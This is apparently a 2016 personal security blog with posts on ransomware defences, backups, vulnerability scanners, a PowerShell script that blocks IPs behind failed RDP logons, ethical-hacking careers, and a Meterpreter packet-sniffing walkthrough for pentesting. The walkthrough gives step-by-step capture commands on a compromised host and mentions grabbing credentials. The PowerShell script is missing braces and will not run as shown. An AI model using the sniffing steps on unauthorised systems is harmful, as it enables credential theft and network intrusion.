Friday, October 7, 2016

Small Business Protection Again Ransomware

Small Business Protection Again Ransomware

There are a lot of system that can help you to protect again ransomware and it is up to your budget. Normally the small business doesn't have the resources for a systems that detect any threat through the email, web filtering on the machine, firewall, etc.

Now there a few things that normally can help the small companies to fight again ransomware:

  1. Backup - Yes backup is not expensive, you can have different options, the one that only backup some files for your shared folder and the one that backup the full image server. Depending of your needs and requirement you can chose. In my case I would recommend image backup of your server or workstation. One full backup and incremental backup. Shadow Protect is a good option.
  2. Good antivirus. One I like a lot is Webroot, low resources and fight pretty good again Ransomware. It protect specially when you are on internet.
  3. Run Windows updates. Your system needs to be patched and all your software updated like java.
  4. Common sense. Yes, this is very important, be careful where you go on internet, what file you open if somebody send you one by email. Normally I do not open a file if I did not ask for it, including if the file comes from my mother.
If you make the math, you will spend only in two things: backup solution and antivirus. I would not go through free backup, you need something automatic, unattendant backup. Set Windows updates automatic and pay attention what you do in your computer, read the alert that Windows or the antivirus tell you when there is a risk.

Tuesday, March 15, 2016

Are Vulnerability scanners broken?

Automated vulnerability scanners provide a lot of false positives reports, this create a lot of work for Security Analyst and some of them hate them. Are Vulnerability scanners broken?

Not necessary, still the automated vulnerability scanners provide a lot of help to identify weakness of the system or OS and it is cheaper compering to a penetration testing.

Security is an ongoing process, automated scanner help to increase the security bar of any system but at the same time it shouldn't replace any penetration testing. After you keep running the automated tool you bring a penetration tester. The pentester will focus in the most difficult weakness because you found the easy one with vulnerability scanner.

So, Are Vulnerability scanners broken? No, they keep helping to protect the data.

Learn more about security:

Thursday, March 3, 2016

Good backup make the day

How is possible that a lot of companies worked without a good back up? The risk is high. Very often in the moment where you do not expect it you get a hit and then the only solution you have is restore from backup.

These are some of examples:

1. User is surfing the internet and hit a site that infect his/her machine and the malware is a crypto locker one, terrible, begin to encrypt all the network drives mapped in that computer and some of those malware including encrypt the shadow files. You have two options: restore from backup or pay the ransom.

2. This is very common, users showed up at 7:30 a.m. and the accounting or file server is not working, you go and check and discover the hard drive is failing or the whole OS is corrupted including the data, etc, etc. Specially with hardware failed you need to restore from backup.

In the previous example what happen if you do not have backup, then prepare your resume, very soon you will begin to look for a job, the company will lose money.

Now what happen if you have backup, you are happy, and begin to restore the data or server and discovered the backup is not working right and you cannot restore anything. Nobody never tested the backups.

Now we can say Houston we got a problem!!!.

I saw others companies who lost data between 30 GBytes to 1 TBytes and they restored the data in a couple of hours, very quickly. Good. Why, because they implemented good backup solution according to their needs.

Types of Backups: Image or files.

No tall the backups are the same, depend of many factors, if you have servers that needs to restore complex applications then you need backup that create images of the machine.

For the file servers is different, you just need to backup the files or data, so in case the files became corrupted, encrypted or deleted you can restore them very easy including in production time.

There are different strategies to protect company data or servers in case of disasters, you know your company and environment, like the people says: Choose wisely.!!!

Do you want to learn more about security? Go to

Sunday, February 28, 2016

Basic Powershell scrip to block IP address during Dictionary Attack to Remote Desktop

Several times you check the Security logs and noticed some IP addresses ate trying to guess any username and password to the remote desktop or RDP.

This script is for Windows 2008/2008R2 and Windows 7.

Because we want to block and stop those attacks a lot of Security Analyst block the IP address in the Firewall (Windows or Appliance). It is good but there is a  big chance that another IP show up attacking when the analyst is sleeping or doing something else.

This script will read the Windows log looking for the Event id 4625 in the last 5 minutes , then will remove the log information and duplicate IP addresses, at the end will write the ip addresses in the firewall to block them. Now this block will be for the whole IP not the port.

The next time you run the script it will delete all the IP addresses the script wrote in the firewall and begin the process again.

Now if there is not any new IP address to add the scrip will end.

This script is basic. So there is not port involved just IP addresses and if a legitit user put wrong password he/she ip will be block it in the next time you runt he script.

Now to run the script every 5 minutes you will need to create a task in the Windows machines to run every 5 minutes.

If you want to copy the script please copy and past in the Notepad to make sure the code is fine otherwise you will get some errors and will troubleshooting.

If you need custom code please contact me and I will be glad to help you for small fee.

This is the script:


netsh advfirewall firewall del rule name="Block IP Attacker"

### This check the latest 5 minutes wrong username and password. If you want to change the time replace the -5 for any minutes you want.

Get-EventLog -LogName Security -After (Get-Date).AddMinutes(-5) | Where-Object {$_.eventID -eq 4625}| Format-List message | Out-File result.txt

### This find the IP addresses line

get-content result.txt | Select-String -Pattern "Source Network Address:" | out-file result2.txt

###CLEAN THE OUTPUT to eliminate any character and letters from the logs

Get-Content result2.txt | ForEach-Object {$_ -replace "Source Network Address:", ""} | ForEach-Object {$_ -replace "-", ""} | out-file result3.txt

Get-Content result3.txt | ForEach-Object {$_.trim()} | out-file result4.txt

Get-Content result4.txt | where {$_ -ne ""} > result5.txt


get-content result5.txt | sort| Get-Unique | out-file result6.txt

Get-Content result6.txt | where {$_ -ne ""} > iptoblock.txt

get-content iptoblock.txt

###CREATING RULES FIREWALL, IF THERE IS NOT ANY ATTACK THE PROGRAM WILL EXIT and will print No New Incidents, I will sleep waiting for new attacks

if ((Get-item iptoblock.txt).length -eq 0)

    write-host "No New Incidents, I will sleep waiting for new attacks"



$c = get-content iptoblock.txt

foreach ($ip in $c){

    netsh advfirewall firewall add rule name="Block IP Attacker" dir=in interface=any action=block remoteip="$ip"


###This will tell you the scrip finish, you can comment this line

write-host "WORK DONE"

This is not part of the script.

Learn more about security at

Monday, January 18, 2016

Packet Sniffing Metasploit with Meterpreter

Meterpreter allow you to run packet sniffer with extension, and something very important is that the sniffer is never saved in the target hard drive. I will explaint hwo to enable packet sniffer with Metasploit with Meterpreter:

Lets consider you are already connect with any exploit and meterpreter enable, then you type the following:

###user sniffer extension

meterpreter > use sniffer

Loading extension sniffer...success.

meterpreter > ?


Sniffer Commands

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_release     Free captured packets on a specific interface instead of downloading them
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

### We try to see what interface we will to use to sniff the traffic

meterpreter > sniffer_interfaces

1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

###You can see the interface 2 is the network one, we will start using that interface:

meterpreter > sniffer_start 2

[*] Capture started on interface 2 (50000 packet buffer)

### Stop the sniffer

meterpreter > sniffer_stop 2

[*] Capture stopped on interface 2
[*] There are 3099 packets (1365925 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'

### Download the data

meterpreter > sniffer_dump 2 /root/raul.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 3099 packets (1427905 bytes)
[*] Downloaded 036% (524288/1427905)...
[*] Downloaded 073% (1048576/1427905)...
[*] Downloaded 100% (1427905/1427905)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/raul.pcap

The I was able to open the file using wireshark raul.pcap


Where can you use this? You can use it to grab credentials, move horizontal on the network if you are pentesting a network or if you are troubleshooting any computer problem on the network.

Friday, January 15, 2016

I want to be Ethical Hacker

A lot of people want to be ethical hacker or penetration testing, it is very rewarded job and also require a lot of effort, I will describe in this article what knowledge you need if you want to be ethical hacker. I will not touch the soft skills only the technical ones.

First this is not an easy path, it will require perseverance and a lot of self study including think completely different than any other tech (outside the box).

Basic Knowledge

Yes, you need to have basic knowledge and it has to be very solid, you do not have the luxury to have holes in your basic knowledge.

Knowledge of Windows/Linux OS, you have to be strong in one of them and very proficient in the second, I am not saying you can create a cluster with those servers, I am saying the same knowledge you should have if you are a System Admin or System Engineer working for an IT company (yes, it is very different working for one company than working for one).

Network knowledge, yes, you have to have knowledge how routing works, tcp/udp, packets, routers, switches, arp, firewalls, etc. How will you bypass a firewall if you do not know how it works or sniff traffic if you do not know switches?

Programming knowledge, you have to have one language where you are strong and if you are going to web ethical hacker you have have more that one language. A lot of hacker use perl and python.

Specialty Knowledge

This depend in what you want to be good, you cannot be strong in all the specialty with some exceptions. These are some example

Specialty Attacking  Network: For this you need to have a good knowledge of protocols, routers, switches firewalls, wifi,packets, etc.

Specialty Attacking Systems: This include a lot of the networks because you use packets, etc. Plus good knowledge in Windows/Linux and how to escalate on it to be an administrator on the server or domain.

Attacking Web Applications: In this you have to have knowledge of different web programming language like ASP, PHP, Java, etc. Also you need to have good databases knowledge, yes, How will you try to do SQL injection when you do not know anything about SQL queries?


A lot of ethical hackers have a mix of skills, They normally are strong in one specialty and a little weak in the other specialty, In the beginning do not worry what skills you will have, Begin to build your skills and later you will find what of those fields you want to be and go for, Enjoy all the process.

Tell us what do you think at

Tuesday, January 12, 2016

Pentest or hack to your new Security Analyst job

You got a phone call for a Security Analyst position in your area, you are excited, you've been applying for that kind of position, now you got their attention and have a first phone interview what will you do?

You will need to follow the same steps that a hacker does when attack a company, let's check:

Phase 1 - Reconnaissance

Yes, you will need to gather information about the company and the person or people who will do the first interview on the phone. Sure the recruiter will tell you the name (s) of them and the time. 

With the name (s) and company name you begin to research, the first thing is the company website, you need to know what the company does and what it means. Inside/out, including what position are available, the requirements, etc.

Now with the interviewer name find everything that is possible, check LinkedIn, Google+, Facebook, etc. Yes, sometime you can get in Internet where he/she lives and what kind of sport he/she plays, the better you know about that person(s) the better you will have a chance to connect.

Phase 2- Scanning

During the phone interview you have the chance to send a few packets, you have the chance to ask questions about the position, requirements, environment, ask interesting question, and those question had to be prepared before the phone interview.  Do not make uncomfortable questions, you do not want to crash your target.

Phase 3 - Gaining Access

This is the face to face interview, here you will be able to send your exploits, show then who you are, your technical and not technical skills like good communication skills. show them the ideal person for the Security Analyst position is YOU.

Remember in this phase you still are discovering, now you need to scan more and a little more, ask more questions and remember do not crash the server, you do not want denial of services DOS.

 Phase 4 - Maintaining Access

In this phase after the phone and face to face interview send an email saying what you got of the interview, showing you are interested in that position and leave the door open for more questions from them, maintain your access.

Phase 5 - Covering Tracks

If you got the position, CONGRATULATION and if not you got a lot of experience in this pentest, you will drill the next one, remember the Pentesters have to be the masters. Also in this situation, where you did not get the position send an email with a thank you for the interview, who knows they keep you in their mind and they could change their decision.

If you look your job search like a penetration testing process, then first you will enjoy it and second you will increase your confidence in yourself and success.

Keep going and enjoy the process.

Please tell me what do you think in the forum at